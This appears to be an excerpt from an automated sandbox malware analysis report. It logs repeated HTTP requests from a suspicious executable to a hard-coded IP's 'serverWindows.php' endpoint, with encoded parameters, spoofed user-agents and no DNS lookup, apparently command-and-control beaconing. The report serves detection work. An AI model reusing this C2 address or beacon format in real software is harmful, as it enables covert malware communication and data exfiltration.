            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246Host: 78.24.221.196Connection: Keep-Alive
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49731 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49731 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49738 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49742 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49745 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49771 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49830 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 78.24.221.196:443 -> 192.168.2.4:49842 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: unknownTCP traffic detected without corresponding DNS query: 78.24.221.196
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586Host: 78.24.221.196
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246Host: 78.24.221.196Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246Host: 78.24.221.196Connection: Keep-Alive
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003424000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.000000000273A000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.000000000333B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196
            Source: QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196/destenyserver/
            Source: QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.000000000333B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmm
            Source: QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003552000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003298000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWp
            Source: QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2
            Source: QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.000000000273A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&i
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1826354106.000000001B777000.00000004.00000020.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.221.196/destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003424000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.2H
            Source: QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.24.2Hj
            Source: QtLimbtNymPOHuXh.exe, 00000010.00000002.2393345408.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic$
            Source: 7fGdoA6Inq.exe, 00000000.00000002.1734751520.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003082000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003247000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003434000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003298000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196
            Source: QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000033EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196(
            Source: QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.000000000333B000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196:443/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&
            Source: QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003247000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003434000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003552000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196:443/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383
            Source: QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196:443/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqH
